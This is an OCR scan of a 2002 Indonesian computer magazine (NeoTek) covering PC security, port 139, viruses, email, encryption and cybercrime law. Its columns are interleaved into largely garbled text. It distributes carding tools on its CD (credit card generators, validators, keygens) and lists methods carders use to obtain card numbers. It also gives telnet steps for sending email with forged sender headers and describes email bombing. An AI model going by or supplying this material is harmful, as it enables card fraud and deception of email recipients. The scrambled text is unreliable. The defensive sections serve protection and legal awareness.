Buka-Tutup Portal
Mengendalikan NetBIOS Session Service
Network Neighborhood yang Berbahaya
danya fasilitas network neighborhood
A amat memudahkan kita berbagi file dan
printer (resource share) dalam LAN,
namun apabila komputer anda terhubung ke
Internet, maka share tersebut dapat diakses
dari seluruh dunia dan dengan mudah dilacak
dengan software seperti Legion 2.1.
Hal ini dimungkinkan karena terbukanya port
139 (NetBIOS session service). Untuk menutup
port itu anda harus menonaktifkan TCP/IP dan
File and Printer Sharing for Microsoft Network.
Kemudian apabila ingin berbagi lagi dalam
LAN, keduanya harus diaktifkan lagi.
Kerepotan ini kini tidak perlu lagi. Cukup guna-
kan NoShare untuk menutup port 139 dan
gunakan LetShare untuk membukanya.
Setelah mengklik salah satu utilitas kecil ini,
komputer anda harus di-restart.
Kini buka-tutup portal tidak lagi merepotkan.
ZoneAlarm
pabila anda perlu
A sharing resources
dan akses Internet
sekaligus, maka gunakan
ZoneAlarm firewall yang
memungkinkan anda
menjaga port 139 sambil
tetap mengaktifkan network
neighborhood.
HomePage
N EOTE K
Pendamping Berselancar
www.neotek.co.id Salam!
Cybercrime memang harus
dihindari, tetapi juga
Anatomi suatu serangan hacking
Footprinting
perlu dipahami.
Scanning
Enumeration
Gaining Access • Program Credit Card Generator digunakan oleh para carder untuk mendapatkan
nomor kartu kredit (CC) yang absah.
www.neotek.co.id
Situs NeoTek neotek.kpone.com.sg
Jadikan situs NeoTek sebagai pangkalan Anda berselancar
Link Langsung Layanan Rupa-rupa NeoTek
Kunjungi situs-situs yang dibahas di Perlengkapan berinternet dari situs NeoTek
majalah NeoTek dengan sekali klik
lewat situs NeoTek. Channel #neoteker di Dalnet
Ngobrol ramai-ramai sesama NeoTeker
NeoTek versi PDF Chat Room
Kehabisan NeoTek di kota Anda? Kini tidak usah jauh-jauh untuk ngobrol
Dapatkan saja versi PDF-nya. Gratis! langsung dengan sesama NeoTeker
Mailing List
Download Ini yang paling ramai. Segera ikutan
Tersedia juga download di situs berbagi pengalaman berinternet!
NeoTek selain dari situs aslinya NeoTeker Official Portal
http://neotek.portal.dk3.com
Situs komunikasi antar Neoteker.
OS dan OS Tools
pada Microsoft IIS. Kali ini berupa
Bank
PC Security
langkah-langkah praktis mengguna- Bank BNI
kan browser maupun FTP client. a.n. PT NeoTek Maju Mandiri
Daftar Isi CD NeoTek
5 Multimedia: Memanipulasi PHP Praktis: Jajak Pendapat
No. rekening 070.001709720.001
Bank BCA KCP Rawamangun
Foto dengan AfterShot Membuat polling dengan PHP. a.n. Aswan Bakri
No. rekening 0940544131
CARDI NG TOOLS
CC Generator
XCCards Windows
XCCards DOS
XCCMaker
XCredit Master 4.0
XCredit Wizard 1.0
XRandom CC Gen. Pro
ebelum akhirnya XTNT Credit 1.9.1
S diputuskan untuk
memuat artikel be-
CC Keygen
XTNT KeyGen
serta tool-tool carding, telah XTNT KeyGen 1.0
terjadi perdebatan apakah XTNT KeyGen 1.1
‘pantas’ artikel tentang pe- XTNT KeyGen 3.0
nyalahgunaan kartu kredit
(credit card fraud) dimuat di en-generate nomor Visa, Mastercard, atau lain- CC Encrypter
NeoTek.
Dari hasil diskusi dengan
M kartu kredit dapat de-
ngan cara ekstrapolasi
nya. Selanjutnya adalah
memvalidasi nomor-nomor
XTNT NCrpTor
CC Validator
Kadit Serse Polda Jateng terhadap nomor kartu kredit kartu kredit yang terbentuk XTNT CC Validator
yang banyak berurusan de- valid yang ada, atau secara itu. Semua itu memerlukan
ngan cybercrime seperti ini random mengikuti pola pem- keterampilan dan seni ter-
dapat disimpulkan bahwa bentukan nomor berdasar- sendiri. Boleh dipelajari tapi
yang menjadi ukuran adalah kan jenisnya apakah itu jangan dipraktikkan!
niat mempelajarinya, bukan
pengetahuan itu sendiri. PC Security
Dengan demikian pada edisi
O S DAN O S TO O L S PC security tools yang disa-
kali ini NeoTek menjayikan empelajari jikan kali ini mencakup:
sisi gelap dari Internet, yaitu
yang menyangkut tindak
M berbagai
macam sis-
BIOS Password Killer
• !BIOS
pidana cybercrime, khusus- tem operasi meng- Port 139 Security
nya carding. Dipelajari un- haruskan anda • NoShare
tuk dipahami dan melindu- menginstalasi sis- • LetShare
ngi diri, bukan dipraktikkan! tem operasi yang • LeakTest
berbeda-beda pada • UnPlug’nPray
Topik besar lainnya kali ini • XPDite
adalah Guest Operating komputer anda,
yang membawa • IP Agent
System dengan mengguna-
kan VMWare serta PC risiko partisi pada Firewall
security, termasuk bahasan hard disk menjadi • Zone Alarm
berantakan. • Tiny Personal Firewall
tentang penyalahgunaan
fasilitas email untuk Hal ini tidak perlu terjadi instal guest OS nyaris apa Email Tools
mengirim email kaleng, apabila kita menginstal sis- saja: Linux, FreeBSD, Netware, • Private Idaho
tem operasi langsung di pelbagai sistem Windows, • eRemover
email palsu, sampai spam. • eCleaner
bawah partisi sistem ope- bahkan .NET server yang
Berbagai software multi-
terbaru! • MailSweep
media akan menarik perha- rasi yang ada, misalnya • Spam Detective
tian anda, selain update Cygwin atau WinLinux 2001
(versi Unix dan Linux pada OS under Windows Security Suite/Encryption
versi-versi mutakhir dari • Steganos
partisi Windows). XCygwin
program umum berselancar
XWinLinux 2001 • PGPFreeware
dan download accelerator Tetapi bagaimana bila meng- Lain-lain
tools. instalasi distro ‘sungguhan’? Virtual Machine • Eatimer
Instal dulu VMWare pada XVMWare 2.0.3 Win • RegClean 4.1
Windows atau Linux anda XVMWare 3.1 Win • Windows Washer
(host OS) dan lewat XVMWare 3.0 Linux • WinLock
VMWare anda dapat meng- XVMWare 3.1.1 Linux • WinSafe
NmN
NeoTeker menjawab NeoTeker
Forum ini dimaksudkan sebagai bentuk offline dari mailing list
NeoTek di http://groups.yahoo.com/group/majalahneotek.
Konfigurasi Client Linux J: Posted September 9 file untuk ga bisa ngedown- langganan leased-line ke ISP,
T: Posted September 6 Coba telnet ke telnet.grex.org load. contoh yang ada hu- dan anda negoisasi dengan
sebelumnya daftarin dulu di bungan dengan kata down- "someone" ini. ISP tidak tahu
Saya barusan coba install www.grex.org atau www. load, video (saya mau buka menahu bahwa leased-line
Redhat 7.2. Gimana caranya cyberspace.org. Ntar di sana file yang bernama video.htm nya dipakai 2 pihak.
supaya client yang berbasis bisa kirim email bisa baca aja ga bisa) , *.zip, *.mp3, Kalau memang seperti itu, an-
linux dapat menjadi anggota imel. cem macem dech. *.avi, *.exe dll, mau update da perlu tahu di mata ISP,
dari suatu domain dengan software ga bisa, pokoknya bahwa semua perbuatan illegal
server NT. Maksudnya dia Ianto sangat dirugikan deh, gue yang anda lakukan menjadi
bisa login seperti pada client ianto@diffy.com sbg operator di warnet ini tanggung jawab "someone"
windows. jadi kecewa berat, mau bela- ini. Misalnya, anda/warnet
J: Posted September 9 jar aja udah susah banget
Yang sekarang berjalan, saya anda melakukan exploit, card-
Gampang kok. Cukup dengan (bayagin aja mau coba tes ing, cracking, dsb., kalau dite-
harus login dulu dengan unicode exploit aja ga bisa
user local (Linux ) baru sintak2x standard SMTP dan lusuri akan jatuh ke "some-
POP3 untuk SMTP minimal krn ada penggunaan ...../ one" ini. Dia bisa ditangkap
kemudian kita login kembali cmd.exe...) padahal kan ke-
kejaringan sesuai dengan pakai reference RFC 821 se- polisi dan dipenjara, semen-
dangkan untuk POP3 mini- bijakan untuk ngeblok kayak tara anda bisa santai-santai
pass untuk jaringan. gituan kan bukan urusan dia
mal pakai reference RFC dapat duit dari warnet. Mung-
Dadang 1725 anda dapat download betul gak? kin dulu dia mau menyewa-
scidefamily@hotpop.com dokumen RFC ini diwebsite Ada gak yang bisa nolong gi- kan bandwidth ke anda, kare-
ku cek: mana cara ngakalinnya, ka- na melihat anda punya niat
J: Posted September 8
http://www25.brinkster.com/ yaknya dia pake transparan baik bikin warnet dan punya
Nggak kebalik tuhh??? linux proxy dengan squid sbg proxi- bisnis. Belakangan dia tahu
di jadiin client buat win?? agusk/comm.aspx
nya dan semua request di bahwa anda suka melakukan
Dengan berpedoman pada paksa untuk ngelewatin port hal illegal, salah satunya me-
Ontohodkasep standard RFC ini anda dapat 3128 (port untuk squid) lakukan exploit bahkan mung-
ontohodkasep@yahoo.com membuat program untuk
fajar 913 kin lebih dari itu.
Telnet SMTP dan POP3 SMTP dan POP3 baik dgn
Visual C++, Visual Basic, fajar1913@yahoo.com Nah, daripada dia dituduh
T: Posted September 6 Delphi atau sebagainya. Wa- macam-macam oleh ISP dan
laupun di Internet komponen J: Posted September 9 masuk penjara, pilihannya
Saya tau hal ini pernah di-
gratis untuk SMTP/POP3 Kalo memang dibuat trans- ada 2:
bahas sebelumnya, cuma
imel saya personal storage- untuk vc++,vb atau delphi paran proxy ya udah ngga 1. Putuskan hubungan bisnis
nya kehapus :( jd imel sblm- tapi rasanya enggak sreg ka- bisa diapa-apakan lagi, cara dengan anda
nya hilang semua ada yg tau lau enggak bikin sendiri ka- yang paling dimungkinkan ya 2. Melakukan blok hingga
caranya d/l & ngirim imel rena akan membuat lebih bilang sama admin isp agar anda/warnet anda cuma
pakai telnet? mengetahui proses alur pemblokiran ini dihentikan. bisa browsing, dengan ha-
SMTP/POP3..:) Biasanya dalam kontrak per- rapan anda yang memu-
Alexander tuskan hubungan bisnis
Dgn modal ini, bisa juga janjian kita dengan isp cuma
alex_scorpion@softhome.net sebatas peminjaman jalur Jadi supaya anda tidak mera-
untuk meng-hack server
J: Posted September 9 SMTP/POP3 milik org lain :- yang mereka sediakan, apa na, pilihannya:
p...huss itu enggak baik. yang lewat pada jalur terse- 1. Anda/warnet anda jangan
Pertama anda harus punya
Coba2x sendiri di komputer but ya menjadi hak kita, ti- melakukan pelanggaran/
shell account, cara mengirim
sendiri :-p :D dak boleh ada pemblokiran illegal, dan diskusikan
emailnya tergantung pada
sama sekali... Kalo masih masalah ini.
fasilitas email yang mau di- Agus Kurniawan ngga bisa dan masih di 2. Putuskan hubungan bisnis
pakai. akurniawan@balicamp.com blokir, sepertinya lebih baik dan sewa bandwidth
Kalau biasanya memakai anda pindah ke ISP lain...:) langsung ke ISP. Dengan
fasilitas pine, anda tinggal Warnet Diblok cara ini, kalau anda
mengetikkan: $ pine. Ke- Bondan Muliawan
T: Posted September 9 melakukan perbuatan
mudian anda tinggal route@telkom.net
Kami sebuah warnet..kami illegal, anda sendiri yang
mengikuti perintah2 yg ada menyewa bandwith dari J: Posted July 23 tanggung jawab.
di situ someone (dari pihak ketiga- Dari cerita anda, saya simpul- Albert Siagian
Elisa Usada lah) tapi yang aneh dan lucu kan bahwa "someone" di sini
lisa@fe.uns.ac.id dia dia ngeblock semua file- bukan ISP. Jadi "someone" ini asiagian@gmx.net
Virus ada bermacam-macam jenisnya. Kebanyakan bersifat nasi backdoor jika menjalankan Trojan—virus yang menya-
merusak, seperti yang disebut dengan nama worm yang mar sebagai, atau menjadi bagian dari, sebuah program
bisa merusak file anda. Worm yang dijumpai belakangan yang bermanfaat. Salah satu “kejahatan” yang dilakukan
ini merusak semua file gambar JPEG pada sebuah kompu- virus backdoor adalah men-dial nomor telepon premium
ter. Yang lain mencoba menyerang sumber daya komputer tanpa anda sadari sehingga suatu saat tiba-tiba tagihan
seperti mengunci memori, membuat crash pada server Web rekening telepon anda membengkak tidak keruan.
NT, sedangkan yang lainnya lagi hanya mengirim email Yang bisa merepotkan adalah virus boot sector. Boot sector
sampah ke setiap orang yang tercantum pada buku alamat hard disk dimasukkan ke memori sebelum program anti
(address book) anda. Virusnya disertakan sehingga kompu- virus melakukan pemeriksaan (scanning). Jika ada virus, si
ter orang yang dikirimi email sampah tersebut melakukan virus dapat tetap bercokol di memori. Virus ini pun akan
hal yang sama. Itulah sebabnya virus buku alamat tersebar berusaha menginfeksi disk lain, termasuk floppy. Itulah
dengan cepat. Virus LoveLetter diperkirakan mengakibat- sebabnya sebuah disket start up Windows yang bersih
kan kerugian sebesar £10 triliun sebelum dijinakkan. Hanya diperlukan!
dalam waktu 6 jam, satu juta orang menerima virus nakal ini.
Yang mengherankan adalah betapa banyak jenis file yang
Virus backdoor adalah salah satu jenis yang paling men- dapat terinfeksi virus. Yang jelas adalah program .EXE,
jengkelkan karena bisa bekerja berbulan-bulan tanpa dapat tetapi tabel di halaman ini menunjukkan jenis virus yang
dideteksi. Virus ini di latar belakang memantau apa yang dapat bekerja “seperti” suatu program-yang dari luar tam-
anda lakukan—mencuri kata sandi atau nomor kartu kredit paknya paling suci adalah screensaver dan file Help.
anda serta memeriksa data anda. Anda dapat terkontami- Berhati-hatilah-bahaya ada di mana-mana!
8 NeoTek November 2002
NeoStart
kan hal yang berbeda seperti email dan FTP. Dan ini semua
File-file yang dapat menularkan virus kadang dapat ditembus. Program firewall yang populer
belakangan ini adalah Zone Alarm yang ada versi gratis-
Mungkin file pada daftar di bawah ini nya. Sedangkan Tiny versi dua (www.tinysoftware. com)
ada yang akan mengejutkan anda selain gratis juga dapat diandalkan. Norton dan McAfee
pun menawarkan solusi yang sifatnya komersial untuk ini.
Kata orang ‘knowledge is power,’ dan anda dapat Norton dan McAfee mempunyai firewall sebagai bagian
membuktikan kebenaran kata-kata ini dengan dari suite komersial mereka, termasuk:
berbekal daftar virus di bawah ini. Pada daftar ini
anda dapat menjumpai tipe-tipe file yang dapat • Norton Personal Firewall
menularkan virus. Yang jelas adalah file .EXE, tetapi • Norton Internet Security suite (termasuk AntiVirus,
banyak tipe file yang dapat berperilaku seperti Firewall dan Parental Control)
program. Yang tampak paling innocent adalah file • McAfee Firewall
• McAfee Virus and Firewall bundle
Screensaver dan Help.
.EXE Program Windows Anda dapat mengecek seberapa amannyakah komputer
.COM Program DOS anda saat ini dengan mengunjungi situs penguji milik
.SCR Screensaver Steve Gibson: www.grc.com.
.BAT File skrip DOS
.PIF Dihubungkan dengan program DOS
Musuh dalam Selimut
.VBS Visual Basic Script Orang lain yang menggunakan komputer anda bisa me-
.MSI Paket penginstal Windows nimbulkan risiko besar. Mereka dapat menghapus data an-
.MSP Patch penginstal Windows da atau secara tidak sengaja menginstal sesuatu yang mem-
.REG Entri Auto Registry buat PC anda tidak dapat bekerja. Jika PC anda dipakai ber-
.URL tombol pintas Internet sama-sama, lindungi PC anda dengan kata sandi dan enkripsi
sebanyak mungkin. Anda juga dapat menggunakan fitur
.VB File skrip VB
Identities di Windows untuk memilah-milah pengguna
.VBE File skrip VB sehingga setiap orang mempunyai folder My Document
.VBS File skrip VB dan kotak surat email masing-masing sehingga aktivitas
.INF Info untuk setup surat-menyurat anda dapat dijaga kerahasiaannya.
.INS Internet settings
.ISP Internet communication settings Teknik untuk Melindungi Komputer
System Policy Editor (PolEdit) menawarkan perlindungan
Apa itu Firewall? yang lebih besar tetapi agak rumit penginstalannya. PolEdit
Jaringan lokal dan Internet memperbesar risiko keamanan dapat ditemukan di folder Tools\Reskit\Netadmin\ PolEdit
yang untungnya dapat diperkecil dengan memasang fire- pada CD-ROM Windows 98. Gunakan “Add/Remove Pro-
wall pada sistem anda. Seperti pintu anti kebakaran pada grams” pada “Control Panel” untuk menginstalnya. Jangan
bangunan, sarana yang satu ini dapat membantu mencegah batasi suatu profil hanya untuk authorised Windows,
akses yang tidak dikehendaki ke PC anda. Koneksi anda akan karena jika anda membatasinya anda tidak akan bisa men-
bekerja secara dua arah dan orang-orang yang berpotensi jalankan PolEdit kembali untuk mengubahnya! Baca FAQ
“jahat” dapat mengintip atau mencuri data anda. pada http://support.microsoft.com/default.aspx?scid=kb;
en-us;Q147381 secara seksama sebelum mencoba PolEdit.
Program Trojan membantu virus semacam ini, tetapi PC Baca petunjuk kami pada halaman berikut.
anda juga menggunakan PORT berbeda untuk mengerja-
DE NGAN STEGANOS
ungkin anda perlu berpikir dua
M kali jika menganggap file-file
yang anda simpan di PC anda
aman dari incaran orang lain. Karena
PC AN DA AMAN & UTU H pada kenyataannya memang tidak
demikian. Orang dengan mudah dapat
membuka folder-folder file anda.
Kini agar anda dapat meninggalkan PC
dengan rasa aman, ada Steganos yang
dapat membantu anda membuat ‘Secure
Steganos II Security Suite dilengkapi dengan berbagai program Space’ di PC anda yang hanya dapat di-
akses oleh anda. Selain itu, masih banyak
pengaman berkomputer yang benar-benar berguna. Steganos akan kegunaan Steganos yang lain. Program
membantu anda menata file-file anda dan menjaganya agar tetap ini dapat anda instal CD NeoTek bulan
ini, tetapi anda perlu mendapatkan serial
aman dari incaran pihak lain. Berikut uraian cara menggunakan number-nya dari www.centurionsoft.com/
Steganos langkah demi langkah yang mudah diikuti. steganos2/general.html.
Steganos memungkinkan anda menyembunyikan dan mengenkripsi file anda sehingga aman
pilih File > Properties lalu pilih tab Detail serta tombol
Message Source. Bandingkan isi From: dengan X-Sender.
• Mengakses SMTP server melalui telnet. Selanjutnya dalam komunikasi Bila berbeda, maka paling tidak anda tahu siapa pengirim
dengan server anda dapat mengirim email dengan header yang diubah sebenarnya. X-Sender berasal dari mail server pengirim
sesuai keinginan anda. dan lebih sukar dimanipulasi.
Email Bomb
akses SMTP server kita dengan telnet dan sewaktu komu-
nikasi dengan SMTP server kita tinggal ketikkan saja email Email dapat digunakan untuk melumpuhkan komputer
address kita (sebagai pengirim) sesuka-suka kita. yang terhubung ke Internet, bahkan seluruh jaringan
komputer perusahaan dapat dilumpuhkan dengan email
Fasilitas telnet terdapat pada setiap mesin Windows dengan
bomb. Untuk melakukan hal ini jumlah email dan ukur-
menjalankan Start > Run lalu ketikkan telnet. Akan tampil
annya harus cukup besar untuk melumpuhkan sasarannya.
jendela Telnet. Pilih menu Connect > Remote System dan
masukkan SMTP mail anda pada Host Name dan anda Metode email bomb yang sederhana adalah dengan me-
akan mengakses server ini melalui fasilitas Telnet. Akses ngirimkan sejumlah besar email ke alamat email korban.
telnet ke server SMTP biasanya hanya disediakan apabila Jumlah email yang dikirim tidak harus ribuan atau lebih;
anda sebagai pelangan ISP tersebut sudah logon ke langsung dapat juga lebih sedikit, asalkan isinya besar, misalnya
ke server-nya melalui fasilitas dial up. dengan memberikan attachment berupa file yang besar.
Bagaimana anda melindungi diri dari kebohongan email Email pribadi dapat saja menjadi serangan email bomb.
palsu ini? Bila anda merasa curiga terhadap email terten- Sebagai contoh bila seseorang mengirimkan anda email
tu, anda harus melihat header-nya. Sayangnya hampir dengan ukuran attachment 10 Mbyte satu saja setiap
semua mailer secara default menyembunyikan data ini. hari, akan membuat mailbox anda penuh dan membuat
email dari pihak lain ditolak oleh mail server anda.
Pada Outlook Express anda dapat melihat rincian header
email yang anda curigai dengan memilih email itu, lalu Lebih parah lagi kalau anda sebagai korban dibuat ber-
langganan pada sejumlah besar mailing list. Daftar mail-
• Dengan Email
Remover anda dapat
memeriksa email
melalui header-nya
dulu, dan email dapat
dihapus tanpa harus
men-download-nya.
ing list dari segala macam jenis dapat dilihat di sini: Untuk memudahkan pengertian, bayangkan bahwa public
http://www.listsareus.com/ key adalah gembok sedangkan private key adalah anak
Untuk melindungi komputer anda dari email bomb, anda kuncinya. Pemilik anak kunci mengirim gembok pada
dapat menggunakan Email Remover, yang dapat di- rekanannya dan meminta agar pesan yang dikirim digem-
download di http://eremover.bizhosting.com/ bok dulu sebelum dikirim. Pesan itu aman dalam perjalanan
sebab pesan yang sudah digembok tidak bisa dibuka sebab
Dengan Email Remover anda tidak perlu men-download kunci untuk membukanya hanya ada di pihak penerima
keseluruhan email, melainkan cukup header-nya saja. pesan (yang juga pengirim gembok tadi).
Dengan daftar email dan ukurannya anda dapat memper-
kirakan email mana yang tidak anda inginkan dan lang- Proses enkripsi asimetrik yang paling terkenal adalah RSA
sung anda hapus di sini. (dari nama penciptanya Rivest, Shamir, dan Adleman). RSA
menggunakan proses matematis yang lebih kompleks diban-
dingkan dengan DES. Hal ini membuatnya memerlukan
Enkripsi Email waktu lebih lama untuk membentuk enkripsi yang lebih
Kerahasiaan email anda terancam bukan oleh para hacker aman. Anda harus memilih antara keamanan dan efisiensi.
ataupun agen-agen rahasia, melainkan para system ad-
ministrator sendiri. Para system administrator kadang- Personal Encryption
kadang bosan tidak tahu apa yang harus dikerjakan selain Kriptografi yang mudah digunakan namun tangguh baru
membaca-baca email orang. Mereka dapat melakukannya ada semenjak Phil Zimmerman memperkenalkan pro-
tanpa sedikit pun meninggalkan jejak. gramnya PGP (Pretty Good Privacy) pada tahun 1991. PGP
memanfaatkan public key cryptography untuk enkripsi dan
Symmetric Encryption digital signing terhadap file-file umum seperti email. PGP
Cara mengatasi hal ini adalah dengan mengenkripsi email dengan cepat menjadi standar de facto untuk personal cryp-
anda. Ada dua macam enkripsi, Symmetric Encryption dan tography, walaupun PGP masih merupakan produk yang
Asymmetric Encryption. Pada symmetric encryption, pe- dibatasi ekspornya oleh pemerintah AS, sehingga Zim-
ngirim dan penerima menggunakan kunci yang sama (si- merman bolak-balik diperiksa oleh pejabat bea cukai AS
metrik). Yang menjadi masalah adalah bahwa kunci ini selama tiga tahun.
harus dikirim pada penerima agar dapat membuka file yang PGP adalah sistem enkripsi hybrid, yang memanfaatkan
dienkripsi tadi. Kunci ini harus dikirim lewat jalur yang baik public key maupun algoritma enkripsi konvensional.
aman, baik lewat telepon, disket, atau format penyimpan Untuk meng-enkrip suatu pesan, suatu kunci rahasia
data lainnya. Dan tentunya jangan dikirin lewat pos biasa. diciptakan dan digunakan untuk mengenkripsi pesan itu.
Standar yang terkenal dalam hal symmetric encryption ini Kunci ini kemudian dienkripsi dengan public key dari
adalah DES (Data Encryption Standard) yang dikembang- penerima pesan dan di-attach bersama pesan yang dien-
kan oleh IBM dan NSA (National Security Agency) pada kripsi tadi.
awal tahun 70-an. Sekarang ini DES digunakan dalam banyak PGP juga digunakan sebagai digital signature yang me-
sistem di Internet seperti secure web protocol (HTTPS) dan mastikan bahwa suatu pesan memang pesan asli dari
SSL selain juga pada home banking standard (HBCI). Salah pengirimnya.
satu variasi DES adalah Triple DES (3DES) yang mempro-
ses tiga proses sehingga mencapai panjang kunci total 192 bit. PGP dapat diperoleh bebas untuk pemakaian pribadi dan
bentuknya yang paling populer adalah seri v2.6.x meng-
Asymmetric Encryption gunakan algoritma IDEA (lisensi gratis untuk pemakaian
pribadi pada PGP) untuk key encryption rahasianya dan
Untuk mengatasi masalah pengiriman kunci seperti yang algoritma RSA untuk bagian public key-nya.
terdapat pada symmetric encryptrion, dikembangkan
asymmetric encryption, yang di sini kedua belah pihak Steganografi
memegang satu dari pasangan kunci.
Berbeda dengan PGP yang mengenkripsi file menjadi teks
Personal key hanya untuk pemakaian sendiri dan harus acak, maka steganografi men-enkripsi teks dengan me-
tetap rahasia dan tidak diberikan pada orang lain. Kunci ini nyembunyikannya pada file gambar atau suara. Stegano-
dapat meng-enkrip dan men-dekrip pesan yang dienkripsi grafi adalah salah satu jenis enkripsi yang menggunakan
dengan public key. symmetric key.
Public key ditujukan un-
tuk didistribusikan pada
rekan komunikasi peme-
gang private key. Public
key akan digunakan un-
tuk mengirimkan pesan
terenkripsi yang hanya
dapat dibuka menggu-
nakan private key.
Dengan alasan itulah mengapa kemudian puter anda, maka hasilnya kira-kira akan
muncul semacam anjuran pada kita semua, tampak seperti Gambar 4.
khususnya kepada para pemerhati dan • Gambar 1. Tampilan program IP Agent Jika sudah selesai, klik tombol Back un-
praktisi (pakar) Internet, agar seyogianya (Shields UP!!) dalam keadaan on-line tuk kembali ke tampilan semula, kemu-
memberikan porsi yang seimbang ketika dian klik alamat IP provider atau ISP anda.
membahas masalah hacking dan keaman- Pada tahap ini, program Shields UP!!
annya. Artinya, pada saat anda memba- akan memberikan dua pilihan: Test My
has masalah hacking, maka akan lebih Shields dan Probe My Ports (Gambar 5).
bijaksana jika informasi itu juga diimbangi
dengan memberikan tip atau solusi untuk
mengatasi dan mengantisipasi serangan
(gangguan) yang dilakukan para hacker. • Gambar 2. Tampilan program IP Agent
(Shields UP!!) dalam keadaan offline
Namun, sebagaimana kita ketahui, prak-
tek atau kenyataan di lapangan teryata
masih jauh dari apa yang diharapkan. Je- Pada Gambar 1, pesan Multiple IPs me-
las sekali terlihat derap langkah kedua- nyiratkan pada kita ada dua buah alamat
nya berjalan dengan tidak seirama. Se- IP yang bisa diperiksa: alamat IP lokal
bagai bukti, mungkin anda sendiri sudah komputer kita dan alamat IP yang dibe-
bisa melihat langsung bahwa di luar sana, rikan ISP, ketika kita melakukan dial-up.
baik di media cetak maupun elektronik, Jika anda sudah benar-benar siap, maka
mulailah dengan mengklik tombol Test • Gambar 5. Menu pilihan berikutnya.
masalah hacking-lah yang selalu menda-
pat prioritas utama pada setiap pemberi- My Shields pada posisi on-line, kemudi- Apabila dengan mengklik tombol Probe
taan (publikasi). Nah, atas dasar itu lah an tunggu sebentar hingga browser anda My Ports, dan program Shields Up tidak
saya mengangkat masalah security men- terbuka dan anda dibawa masuk ke Web menemukan sesuatu yang mencurigakan
jadi topik bahasan dalam artikel kali ini. server grc.com (Gambar 3). atau membahayakan pada salah satu pro-
Adapun utility yang akan kita manfaat- Setelah browser anda berhasil menam- tokol, maka seharusnya Shields Up anda
kan sebagai alat untuk memeriksa apakah pilkan ke dua buah alamat IP yang akan akan menuliskan pesan There is NO EVI-
komputer yang kita hubungkan ke In- diperiksa (Gambar 3), mulailah lakukan DENCE WHATSOEVER that a port (or even
ternet sudah benar-benar aman (secure) pemeriksaan dengan mengklik salah satu any computer) exists at this IP address!
atau tidak, adalah dengan menggunakan dari dua buah alamat IP tersebut. Seba-
IP Agent, atau yang oleh pembuatnya gai contoh, klik alamat IP lokal kom-
disebut Shields UP!!. Singkatnya, Shields
UP!! atau IP Agent adalah sebuah utility
yang berfungsi untuk menguji/meng-
analisa protokol-protokol Internet yang
sedang aktif ketika komputer melakukan
akses Internet. Jadi anda harus maklum
bahwa program atau utility Shields UP!!
hanya dikhususkan bagi user yang me-
miliki akses langsung ke Internet, baik
itu dari rumah atau Warnet. Jika anda
tertarik, dan ingin mencobanya langsung
di komputer anda, silakan download pro-
• Gambar 3. Tampilan situs Shields UP!!
gram tersebut di www.grc.com. • Gambar 6. Laporan hasil pemeriksaan.
untuk memulai pemeriksaan
Hacker adalah seseorang yang mampu dan dapat 1. Mendapatkan nomor kartu kredit (CC) dari tamu
memprogram jaringan serta mempelajari sistem hotel, khususnya orang asing.
jaringan, namun tidak merusak/mencuri data. 2. Mendapatkan nomor kartu kredit melalui kegiatan
Hacking adalah kegiatan yang dilakukan oleh chatting di Internet.
seseorang untuk mencari informasi melalui program 3. Melakukan pemesanan barang ke perusahaan di luar
yang ada dengan menggunakan komputer. negeri dengan menggunakan Jasa Internet.
Cracker adalah seseorang yang mampu dan dapat 4. Mengambil dan memanipulasi data di Internet
menembus suatu jaringan serta mencuri/merusak
jaringan tersebut. 5. Memberikan keterangan palsu, baik pada waktu
pemesanan maupun pada saat pengambilan barang di
Precker adalah seseorang yang mampu menembus Jasa Pengiriman (kantor pos, UPS, Fedex, DHL, TNT,
suatu jaringan dan memberitahukan kepada jaringan dlsb.).
tersebut tentang keadaan pengamanan jaringannya
yang dapat ditembus oleh orang lain.
Pasal 362 KUHP tentang Pencurian Pasal 378 KUHP tentang Penipuan
Pasal 263 KUHP tentang Pemalsuan Pasal 406 KUHP tentang Pengrusakan
b. Sworn written affidafit/BAP Sumpah untuk saksi dan perangkat hokum konvensional yang ada di Indonesia
korban yang berada di luar negeri dilakukan dengan belum atau tidak bisa menjangkau secara efektif karena
bantuan US Secret Service dan disosialisasikan kepada itu perlu diwujudkan hukum baru atau cyberlaw. Selain
PU dan pengadilan untuk menjadi alat bukti yang sah itu diperlukan peralatan forensik computing yang tepat
dalam proses pengadilan. guna pembuktian kejahatannya, serta menyiapkan
c. Melakukan koordinasi dengan jaksa pengiriman penyidik Polri untuk dididik dan mampu menyidik
internasional dalam hal pengungkapan perkara. cybercrime serta kerja sama dengan penegak hukum
d. Melibatkan saksi ahli dari AKKI (Asosiasi Kartu Kredit dengan yang ada di luar negeri.
Indonesia).
Upaya Penanggulangan
Hal-hal yang perlu diperhatikan dalam upaya penanggu-
langan kejahatan yang dilakukan dengan menggunakan
sarana komputer adalah sebagai berikut:
Apabila Sampai Terjadi (Semoga Tidak)
a. Meningkatkan sistem keamanan jaringan dan
informasi.
b. Memasang kontrol akses untuk menyaring pabila sampai terjadi ada anggota keluarga kita
user/pemakai sehingga hanya pemilik saja yang dapat
menggunakan jaringan tersebut.
A yang melakukan tindak pidana cybercrime dan
ditangkap polisi, maka perlu dipahami:
c. Melakukan penyaringan terhadap isi dari komunikasi a. Masa penahanan maksimum 20 hari.
elektronik.
d. Mencegah akses ke situs yang tidak berkaitan dengan b. Pengurusan sworn written affidafit/BAP untuk
bidang tugasnya. sasksi dan korban biasanya memakan waktu cukup lama
(dapat beberapa bulan).
Penutup Dengan demikian hampir pasti terhadap tersangka
Cybercrime merupakan permasalahan yang harus tindak pidana cybercrime akan dilakukan penangguhan
ditangani secara serius karena dampak dari kejahatan ini penahanan. Jadi apabila ada pihak-pihak yang
sangat luas dan banyak merugikan perekonomian menawarkan ‘jasa baik’ (dengan imbalan uang) untuk
masyarakat karena apabila tidak ditanggulangi akan membantu melakukan penangguhan penahanan, tidak
berkembang dan tidak terkendali dan dampaknya dapat usah dilayani.
sangat fatal bagi kehidupan bermasyarakat. Dari informasi lisan yang diperoleh dari Drs. Rusbagio
Kendala utama dalam penyelidikan cybercrime antara lain Ishak, Kombes Pol/49120373, Kadis Serse Polda Jateng.
boderless baik korbannya maupun tersangkanya sehingga
AGI ANDA YANG SUDAH BIASA CHATTING DI IRC suatu saat rekan anda di Internet mengirim mail, atau
B (Internet Relay Chat), mungkin istilah carder,
carding, dan CC sudah akrab di telinga anda.
memberitahu kepada anda alamat situsnya (homepage)
dengan domain atau host yang menurut anda agak
Kalau belum, cobalah bergabung (join) ke channel #cc, terkesan “wah,” maka cobalah untuk menyelidikinya,
